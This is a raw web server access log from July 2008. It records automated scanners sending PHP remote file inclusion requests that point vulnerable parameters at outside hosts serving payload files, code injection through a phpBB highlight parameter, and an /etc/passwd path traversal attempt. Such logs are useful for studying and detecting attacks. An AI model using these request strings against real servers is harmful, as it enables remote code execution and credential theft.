208.186.78.5 - - [23/Jul/2008:09:05:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [23/Jul/2008:09:05:14 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [23/Jul/2008:09:05:14 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:05:32 -0700] "GET /logs/access_080118.log/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:05:32 -0700] "GET /errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:05:32 -0700] "GET /logs/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.89.210.131 - - [23/Jul/2008:09:05:37 -0700] "GET /logs/access_080118.log/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [23/Jul/2008:09:05:38 -0700] "GET /errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [23/Jul/2008:09:05:38 -0700] "GET /logs/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:05:40 -0700] "GET /logs/access.log/administrator/components/dfd_cart/app.lib/product.control/core.php/product=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:05:41 -0700] "GET /administrator/components/dfd_cart/app.lib/product.control/core.php/product=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:05:41 -0700] "GET /logs/administrator/components/dfd_cart/app.lib/product.control/core.php/product=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:06:14 -0700] "GET /becommunity/community/index.php?pageurl=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4948M.JPG HTTP/1.1" 200 246361 "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4953M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4951M.JPG HTTP/1.1" 200 231539 "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4952M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4956M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4958M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:23 -0700] "GET /bikes/dteel/2008_07_20/IMG_4963M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:24 -0700] "GET /bikes/dteel/2008_07_20/IMG_4964M.JPG HTTP/1.1" 200 80091 "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:24 -0700] "GET /bikes/dteel/2008_07_20/IMG_4954M.JPG HTTP/1.1" 200 102872 "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:24 -0700] "GET /bikes/dteel/2008_07_20/IMG_4967M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:24 -0700] "GET /bikes/dteel/2008_07_20/IMG_4965M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
12.4.26.248 - - [23/Jul/2008:09:06:24 -0700] "GET /bikes/dteel/2008_07_20/IMG_4971M.JPG HTTP/1.1" 200 195797 "http://www.st-owners.com/forums/showthread.php?t=45635&page=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
77.91.224.9 - - [23/Jul/2008:09:06:41 -0700] "GET /logs/access_080128.log HTTP/1.1" 200 458752 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
209.163.169.99 - - [23/Jul/2008:09:06:55 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [23/Jul/2008:09:06:59 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proxi-com.ru/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:07:07 -0700] "GET /logs/access_071225.log/coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:07:07 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:07:07 -0700] "GET /coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:07:07 -0700] "GET /logs/coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:07:08 -0700] "GET /logs/access_071218.log/coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:07:09 -0700] "GET /shoutbox/expanded.php?conf=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:07:09 -0700] "GET /logs/shoutbox/expanded.php?conf=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:07:19 -0700] "GET /logs/access_071225.log/coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:07:20 -0700] "GET /coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:07:20 -0700] "GET /logs/coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:07:21 -0700] "GET /logs/access_071218.log/coppercop/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:07:42 -0700] "GET /logs/access_080329.log/addevent.inc.php?agendax_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:07:43 -0700] "GET /addevent.inc.php?agendax_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:07:43 -0700] "GET /logs/addevent.inc.php?agendax_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [23/Jul/2008:09:08:11 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.78.5 - - [23/Jul/2008:09:08:13 -0700] "GET /logs/access_080329.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [23/Jul/2008:09:08:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [23/Jul/2008:09:08:14 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [23/Jul/2008:09:08:17 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.107.222.20 - - [23/Jul/2008:09:08:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.107.222.20 - - [23/Jul/2008:09:08:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.80.225 - - [23/Jul/2008:09:08:57 -0700] "GET /logs/access_080329.log//newspublish/include.php?path%5Bdocroot%5D=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [23/Jul/2008:09:08:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [23/Jul/2008:09:08:58 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:01 -0700] "GET /logs/access_080329.log/rconfig.inc.php?config%5Broot_dir%5D=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:01 -0700] "GET /rconfig.inc.php?config%5Broot_dir%5D=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:01 -0700] "GET /logs/rconfig.inc.php?config%5Broot_dir%5D=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.53.219.68 - - [23/Jul/2008:09:09:03 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.130.171 - - [23/Jul/2008:09:09:06 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.130.171 - - [23/Jul/2008:09:09:06 -0700] "GET /modifyform.html?code=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.130.171 - - [23/Jul/2008:09:09:06 -0700] "GET /logs/modifyform.html?code=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.80.225 - - [23/Jul/2008:09:09:10 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://1000mbit.cust.ipeer.se/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:15 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:15 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:15 -0700] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:09:15 -0700] "GET /logs/access_080225.log/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.86.193 - - [23/Jul/2008:09:09:21 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:09:21 -0700] "GET /logs/access.log/addevent.inc.php?agendax_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:09:25 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:09:26 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:09:26 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:09:29 -0700] "GET /logs/access_080318.log/administrator/components/dfd_cart/app.lib/product.control/core.php/product=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.130.171 - - [23/Jul/2008:09:09:53 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [23/Jul/2008:09:09:55 -0700] "GET /logs/access_071225.log/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:22 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:24 -0700] "GET /?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:25 -0700] "GET /logs/?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 200 57423 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:26 -0700] "GET /logs/access.log/index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:26 -0700] "GET /index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:26 -0700] "GET /logs/index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.77.144 - - [23/Jul/2008:09:10:28 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:35 -0700] "GET /logs/access.log/errors.php?error=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:36 -0700] "GET /errors.php?error=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:10:36 -0700] "GET /logs/errors.php?error=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:11:12 -0700] "GET /logs/access_080329.log%20/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:11:17 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:11:17 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:11:19 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 18419 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:11:34 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:11:34 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:11:38 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:11:39 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.43.200.98 - - [23/Jul/2008:09:11:41 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.43.200.98 - - [23/Jul/2008:09:11:41 -0700] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.43.200.98 - - [23/Jul/2008:09:11:41 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.171 - - [23/Jul/2008:09:11:45 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.130.171 - - [23/Jul/2008:09:11:45 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.89.210.131 - - [23/Jul/2008:09:11:45 -0700] "GET /logs/access_071225.log/errors.php?error=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.52.194 - - [23/Jul/2008:09:12:30 -0700] "GET /logs/access_071230.log/index.php?lang=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.53 - - [23/Jul/2008:09:12:31 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.52.194 - - [23/Jul/2008:09:12:32 -0700] "GET /index.php?lang=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 200 18403 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.52.194 - - [23/Jul/2008:09:12:32 -0700] "GET /logs/index.php?lang=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.206.98.45 - - [23/Jul/2008:09:12:39 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yarma.t35.com/gbs/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
91.198.175.18 - - [23/Jul/2008:09:12:42 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.43.200.98 - - [23/Jul/2008:09:12:50 -0700] "GET /logs/access.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.155.107.10 - - [23/Jul/2008:09:13:02 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.70.18 - - [23/Jul/2008:09:13:09 -0700] "GET /logs/access_080212.log//admin/spaw/spaw_control.class.php?spaw_root=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:13:11 -0700] "GET /logs/access_080123.log/becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:13:11 -0700] "GET /becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:13:12 -0700] "GET /logs/becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.98.3 - - [23/Jul/2008:09:13:28 -0700] "GET /index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
